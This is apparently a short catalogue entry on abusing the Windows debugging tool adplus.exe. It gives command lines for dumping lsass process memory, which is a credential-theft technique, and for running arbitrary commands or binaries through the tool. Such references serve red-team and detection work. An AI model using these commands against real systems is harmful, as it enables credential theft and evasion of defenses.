Debugging tool included with Windows Debugging Tools
Creates a memory dump of the lsass process
adplus.exe -hang -pn lsass.exe -o C:\Windows\Temp\folder -quiet
Dump process memory using adplus config file (see Resources section for a sample file).
adplus.exe -c file.xml
Execute arbitrary commands using adplus config file (see Resources section for a sample file).
adplus.exe -c file.xml
Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
adplus.exe -crash -o "C:\Windows\Temp\folder" -sc file.exe